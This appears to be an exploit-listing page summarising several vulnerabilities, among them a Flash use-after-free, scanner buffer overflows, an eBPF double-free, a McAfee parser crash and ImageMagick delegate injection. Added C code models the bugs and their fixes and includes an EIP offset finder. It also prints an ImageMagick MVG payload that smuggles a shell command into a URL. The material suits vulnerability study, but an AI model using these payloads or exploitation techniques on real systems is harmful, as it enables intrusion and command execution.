Explore all Exploits:

Use-After-Free Vulnerability

There is a use-after-free in Flash that appears to be related to rendering the display based on multiple scripts. A PoC is attached, tested on Windows only. Note that the PoC is somewhat unreliable on some browsers: sometimes it needs to render for a minute or two in the foreground before crashing. The unreliability lies in getting the freed object reallocated with a value that causes the crash, not in the underlying bug (it crashes immediately in a debug build of Flash). With enough effort, an attacker could likely trigger the issue immediately.

CIScanv1.00 Hostname/IP Field Local BoF PoC

Irving Aguilar discovered a buffer overflow in the Hostname/IP field of CIScan v1.00. To trigger it, run the Python script that generates the payload file, copy the file's contents to the clipboard, paste them into the Hostname/IP field of CIScan.exe, click the Add button and then the Accept button; the application crashes.

RPCScan v2.03 Hostname/IP Field Local BoF PoC

Irving Aguilar discovered a buffer overflow in RPCScan v2.03. It is triggered when a maliciously crafted string is copied to the clipboard and pasted into the Hostname/IP field of the application, crashing it (denial of service).
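Both PoCs above follow the same recipe: generate a long string, paste it into the field, then work out which part of it ends up in the instruction pointer. As an added example (not Irving Aguilar's script, which is not reproduced on this page), the C program below generates the Metasploit-style cyclic pattern into a file for pasting and, once a crash yields a register value, maps that value back to its offset in the pattern. The output file name pattern.txt and the default length of 5000 bytes are assumptions.

```c
/* Added example: cyclic pattern generator / offset finder for clipboard-paste
 * local BoF PoCs such as the CIScan and RPCScan Hostname/IP field crashes. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fill buf with the "Aa0Aa1Aa2...Zz9" pattern (unique 4-byte windows for up to
 * 20280 bytes). buf must hold len + 1 bytes; the result is NUL-terminated. */
size_t pattern_create(char *buf, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                char trip[3] = { a, b, c };
                for (int i = 0; i < 3 && n < len; i++)
                    buf[n++] = trip[i];
            }
    buf[n] = '\0';
    return n;
}

/* Given the 32-bit value observed in EIP after the crash (read as a
 * little-endian dword), return its offset in the pattern, or -1 if absent. */
long pattern_offset(const char *pat, unsigned int eip)
{
    char needle[5] = { (char)(eip & 0xff), (char)((eip >> 8) & 0xff),
                       (char)((eip >> 16) & 0xff), (char)((eip >> 24) & 0xff), 0 };
    const char *p = strstr(pat, needle);
    return p ? (long)(p - pat) : -1;
}

/* Write the pattern to path so it can be copied to the clipboard and pasted
 * into the Hostname/IP field. No trailing newline: a newline may be treated
 * as Enter by the dialog. Returns 0 on success. */
int write_pattern_file(const char *path, size_t len)
{
    char *buf = malloc(len + 1);
    if (!buf) return -1;
    pattern_create(buf, len);
    FILE *fp = fopen(path, "wb");
    if (!fp) { free(buf); return -1; }
    fwrite(buf, 1, len, fp);
    fclose(fp);
    free(buf);
    return 0;
}

/* Usage: ./pattern [length] [eip-value]   e.g. ./pattern 5000 0x39654138 */
int main(int argc, char **argv)
{
    size_t len = argc > 1 ? strtoul(argv[1], NULL, 10) : 5000;   /* assumed default */
    if (write_pattern_file("pattern.txt", len) != 0) return 1;    /* assumed file name */
    printf("wrote %zu-byte pattern to pattern.txt\n", len);
    if (argc > 2) {
        char *buf = malloc(len + 1);
        if (!buf) return 1;
        pattern_create(buf, len);
        printf("offset of %s in pattern: %ld\n", argv[2],
               pattern_offset(buf, (unsigned int)strtoul(argv[2], NULL, 0)));
        free(buf);
    }
    return 0;
}
```

The offset lookup assumes a little-endian 32-bit target, which is what a 32-bit Windows GUI application like the scanners above presents; on a crash the four bytes in EIP read backwards spell the pattern fragment that overwrote the saved return address.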

Baidu Spark Browser URL spoof vulnerability

Baidu Spark Browser is vulnerable to address bar spoofing in the latest version of the browser (43.23.1000.476). Using specially crafted JavaScript, the URL shown in the address bar can be spoofed, tricking the user into believing they are visiting a different site than the one actually loaded. This can be used for phishing attacks.

Use-after-free in replace_map_fd_with_map_ptr()

In Linux >= 4.4, when the CONFIG_BPF_SYSCALL config option is set and the kernel.unprivileged_bpf_disabled sysctl has not been explicitly set to 1 at runtime, unprivileged code can use the bpf() syscall to load eBPF socket filter programs. When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first function that touches the supplied eBPF instructions is replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF map file descriptors and looks up the corresponding map files through __bpf_map_get(). The problem is that when the caller supplies a file descriptor number referring to a struct file that is not an eBPF map, both __bpf_map_get() and replace_map_fd_with_map_ptr() call fdput() on the struct fd. If __fget_light() detected that the file descriptor table entry was stale, it will have already called fput() on the struct file, and the second call to fdput() causes a use-after-free.
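The double fdput() is easier to see in isolation. The program below is an added user-space model, not kernel code: the struct and function names mirror the kernel's, but the bodies are simplified stand-ins. It assumes (my reading, not stated on the page) that fdget() takes a reference and sets FDPUT_FPUT whenever the fd table is shared, i.e. in a multi-threaded process, so that each fdput() really drops one reference; with a private fd table no reference is taken and the two fdput() calls are harmless, which is why the bug needs a thread to trigger in this model.

```c
/* Added example, not kernel code: user-space model of the double fdput() in
 * Linux 4.4's replace_map_fd_with_map_ptr() -> __bpf_map_get() error path. */
#include <stdio.h>
#include <errno.h>

#define FDPUT_FPUT 1            /* kernel flag: fdput() owes a reference drop */

struct file {
    int f_count;                /* reference count; the fd table holds one */
    int is_bpf_map;             /* models f_op == &bpf_map_fops */
    int freed;                  /* set once f_count reaches zero */
};

struct fd { struct file *file; unsigned flags; };

static void fput(struct file *file)
{
    if (--file->f_count <= 0)
        file->freed = 1;        /* last reference gone: the struct file is released */
}

static void fdput(struct fd f)
{
    if (f.flags & FDPUT_FPUT)
        fput(f.file);
}

/* Model of __fget_light(): with a shared fd table (multi-threaded task) it must
 * take a reference and flag it for fdput(); single-threaded it takes none. */
static struct fd fdget(struct file *file, int table_shared)
{
    struct fd f = { file, 0 };
    if (file && table_shared) { file->f_count++; f.flags = FDPUT_FPUT; }
    return f;
}

/* Vulnerable 4.4 shape: the helper drops the reference itself on the
 * "not a map" path, although the caller still owns the struct fd. */
static struct file *__bpf_map_get_vuln(struct fd f)
{
    if (!f.file) return NULL;
    if (!f.file->is_bpf_map) {
        fdput(f);               /* first fdput() */
        return NULL;
    }
    return f.file;
}

/* Fixed shape: only the owner of the struct fd calls fdput(). */
static struct file *__bpf_map_get_fixed(struct fd f)
{
    if (!f.file || !f.file->is_bpf_map) return NULL;
    return f.file;
}

/* Model of replace_map_fd_with_map_ptr() handling one map-fd instruction. */
static int replace_map_fd_with_map_ptr(struct file *file, int table_shared, int fixed)
{
    struct fd f = fdget(file, table_shared);
    struct file *map = fixed ? __bpf_map_get_fixed(f) : __bpf_map_get_vuln(f);
    if (!map) {
        fdput(f);               /* second fdput() on the vulnerable path */
        return -EINVAL;
    }
    /* ... would store the map pointer into the instruction here ... */
    fdput(f);
    return 0;
}

/* Returns 1 if passing a non-map fd frees the file while the fd table still
 * holds its reference, i.e. the use-after-free condition. */
int triggers_uaf(int table_shared, int fixed)
{
    struct file nonmap = { 1, 0, 0 };   /* refcount 1: owned by the fd table only */
    replace_map_fd_with_map_ptr(&nonmap, table_shared, fixed);
    return nonmap.freed;
}

int main(void)
{
    printf("vulnerable, shared fd table:  freed=%d\n", triggers_uaf(1, 0));
    printf("vulnerable, private fd table: freed=%d\n", triggers_uaf(0, 0));
    printf("fixed, shared fd table:       freed=%d\n", triggers_uaf(1, 1));
    return 0;
}
```

On a real system the first thing to check is the sysctl named above: with kernel.unprivileged_bpf_disabled=1 the bpf() syscall is refused for unprivileged callers before replace_map_fd_with_map_ptr() is ever reached.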

Race Condition in perf_event_open() Allows Local Attackers to Leak Sensitive Data from Setuid Programs

A race condition in perf_event_open() allows local attackers to bypass the ptrace_may_access() check and the perf_event_exit_task(current) call that is performed in install_exec_creds() during privileged execve() calls. This allows attackers to observe the execution of setuid executables using performance event monitoring, which can be used to leak interesting data by setting up sampling breakpoint events (PERF_TYPE_BREAKPOINT) that report userspace register contents (PERF_SAMPLE_REGS_USER) to the tracer.

Fuzzing packed executables with McAfee’s LiveSafe 14.0 on Windows

Fuzzing packed executables against McAfee's LiveSafe 14.0 on Windows found a signedness error when parsing PE sections and relocations. The attached fuzzed testcase demonstrates this and crashes in mscan64a.dll. The scanner runs as SYSTEM on Windows, with no sandboxing, and is used to parse untrusted remote input. At the crash the code attempts to read a byte from 0x90000fff, which is obviously an invalid address.
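The page does not show the scanner's code, so the following is a hypothetical model of the bug class, added here and not McAfee's code. A PE section header whose PointerToRawData is 0x90000fff passes a bounds check written with signed 32-bit integers, because the value is negative as int32_t, and the subsequent read lands at the invalid address quoted above; the same check written with unsigned arithmetic that cannot wrap rejects it. The header bytes are constructed for the example; the field offsets follow the IMAGE_SECTION_HEADER layout (SizeOfRawData at byte 16, PointerToRawData at byte 20).

```c
/* Added example, not McAfee code: signed vs. unsigned bounds check on the raw
 * data pointer of a PE section header. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Vulnerable: signed fields. 0x90000fff is -1879044097 as int32_t, so the
 * sum stays below file_size and the caller goes on to read at file + ptr_raw. */
int section_in_bounds_vuln(int32_t file_size, int32_t ptr_raw, int32_t size_raw)
{
    if (ptr_raw + size_raw > file_size)
        return 0;
    return 1;
}

/* Hardened: unsigned fields, and a subtraction instead of an addition so that
 * neither a huge pointer nor a huge size can wrap past file_size. */
int section_in_bounds_fixed(uint32_t file_size, uint32_t ptr_raw, uint32_t size_raw)
{
    if (ptr_raw > file_size)
        return 0;
    if (size_raw > file_size - ptr_raw)
        return 0;
    return 1;
}

/* Extract the two fields from a 40-byte IMAGE_SECTION_HEADER and run the
 * chosen check; returns 1 if the section's raw data would be accepted. */
int check_section_header(const uint8_t hdr[40], uint32_t file_size, int fixed)
{
    uint32_t size_raw = le32(hdr + 16);   /* SizeOfRawData */
    uint32_t ptr_raw  = le32(hdr + 20);   /* PointerToRawData */
    if (fixed)
        return section_in_bounds_fixed(file_size, ptr_raw, size_raw);
    return section_in_bounds_vuln((int32_t)file_size, (int32_t)ptr_raw, (int32_t)size_raw);
}

int main(void)
{
    /* Constructed header: name ".text", SizeOfRawData 0x200, PointerToRawData 0x90000fff */
    uint8_t hdr[40];
    memset(hdr, 0, sizeof hdr);
    memcpy(hdr, ".text", 5);
    hdr[16] = 0x00; hdr[17] = 0x02; hdr[18] = 0x00; hdr[19] = 0x00;
    hdr[20] = 0xff; hdr[21] = 0x0f; hdr[22] = 0x00; hdr[23] = 0x90;

    printf("signed check accepts section:   %d\n", check_section_header(hdr, 4096, 0));
    printf("unsigned check accepts section: %d\n", check_section_header(hdr, 4096, 1));
    return 0;
}
```

The same pattern applies to the relocation table the advisory mentions: any file offset taken from the image and compared as a signed 32-bit quantity lets a crafted header steer the parser outside the mapped file.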

TLS-Attacker

TLS-Attacker is a Java-based framework for testing TLS implementations and building proofs of concept for attacks such as the padding oracle attack. A test run is driven by an XML configuration that describes each message the tool sends and the fields it carries. The referenced configuration (rsa-overflow.xml) defines the ClientHello message, including the supported cipher suites, compression methods and elliptic curves, and a ClientKeyExchange message carrying a flag that enables the padding oracle attack; the server's responses to the manipulated messages show whether the implementation leaks the information needed to decrypt encrypted data.

ImageMagick: Multiple vulnerabilities in image decoder

ImageMagick can hand files to external programs through a feature called 'delegates'. A delegate is implemented as a system() call on a command string ('command') taken from the config file delegates.xml, with the placeholders replaced by actual values (input/output filenames etc). Because the %M parameter is insufficiently filtered, shell command injection is possible. One of the default delegate commands handles https requests: "wget" -q -O "%o" "https:%M", where %M is the link taken from the input. Passing a value such as https://example.com"|ls "-la closes the double-quoted argument and executes an unexpected 'ls -la' (wget or curl must be installed for the delegate to run).

exploit.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com"|ls "-la)'
pop graphic-context
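To make the injection concrete, the program below is an added example, not ImageMagick's own code: it models the substitution of %M and %o into the https delegate template and shows the command line that results from the MVG payload above, next to a hardened builder that refuses any link containing characters outside a URL allowlist. The builder, the allowlist and the assumption that %M is everything after the "https:" prefix are mine; ImageMagick's real substitution lives in its delegate code and is not reproduced here.

```c
/* Added example, not ImageMagick code: how "wget" -q -O "%o" "https:%M"
 * becomes a shell command, and why the payload's double quotes break out. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Length of the template after %M and %o substitution (no filtering). */
static size_t expanded_len(const char *tmpl, const char *link, const char *output)
{
    size_t n = 0;
    for (const char *p = tmpl; *p; p++) {
        if (p[0] == '%' && p[1] == 'M')      { n += strlen(link);   p++; }
        else if (p[0] == '%' && p[1] == 'o') { n += strlen(output); p++; }
        else n++;
    }
    return n;
}

/* Vulnerable behaviour: splice the link and output name straight into the
 * command string, which is then handed to system(). Caller frees the result. */
char *build_delegate_command(const char *tmpl, const char *link, const char *output)
{
    char *cmd = malloc(expanded_len(tmpl, link, output) + 1);
    if (!cmd) return NULL;
    char *q = cmd;
    for (const char *p = tmpl; *p; p++) {
        if (p[0] == '%' && p[1] == 'M') {
            size_t l = strlen(link);   memcpy(q, link, l);   q += l; p++;
        } else if (p[0] == '%' && p[1] == 'o') {
            size_t l = strlen(output); memcpy(q, output, l); q += l; p++;
        } else {
            *q++ = *p;
        }
    }
    *q = '\0';
    return cmd;
}

/* Hardened: allow only characters that can appear in a URL and that are inert
 * inside the template's double quotes. Quotes, backticks, $, \, |, ;, whitespace
 * and control characters are all rejected. Hypothetical allowlist. */
int link_is_safe(const char *link)
{
    static const char allowed[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
        "-._~:/?#[]@%=+,&";
    return link[0] != '\0' && strspn(link, allowed) == strlen(link);
}

/* Returns NULL instead of a command when the link fails the allowlist. */
char *build_delegate_command_safe(const char *tmpl, const char *link, const char *output)
{
    if (!link_is_safe(link)) return NULL;
    return build_delegate_command(tmpl, link, output);
}

int main(void)
{
    const char *tmpl = "\"wget\" -q -O \"%o\" \"https:%M\"";
    /* %M as taken from fill 'url(https://example.com"|ls "-la)' above,
     * assuming the "https:" prefix is stripped by the coder lookup */
    const char *payload = "//example.com\"|ls \"-la";

    char *cmd = build_delegate_command(tmpl, payload, "/tmp/out.png");
    printf("vulnerable: %s\n", cmd ? cmd : "(alloc failed)");
    free(cmd);

    cmd = build_delegate_command_safe(tmpl, payload, "/tmp/out.png");
    printf("hardened:   %s\n", cmd ? cmd : "(rejected)");
    free(cmd);
    return 0;
}
```

The vulnerable builder yields "wget" -q -O "/tmp/out.png" "https://example.com"|ls "-la", which the shell parses as wget piped into ls -la. Filtering the substituted value is a mitigation of last resort; the more robust response is to stop ImageMagick from invoking shell delegates for untrusted input at all, which is done in its policy.xml.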
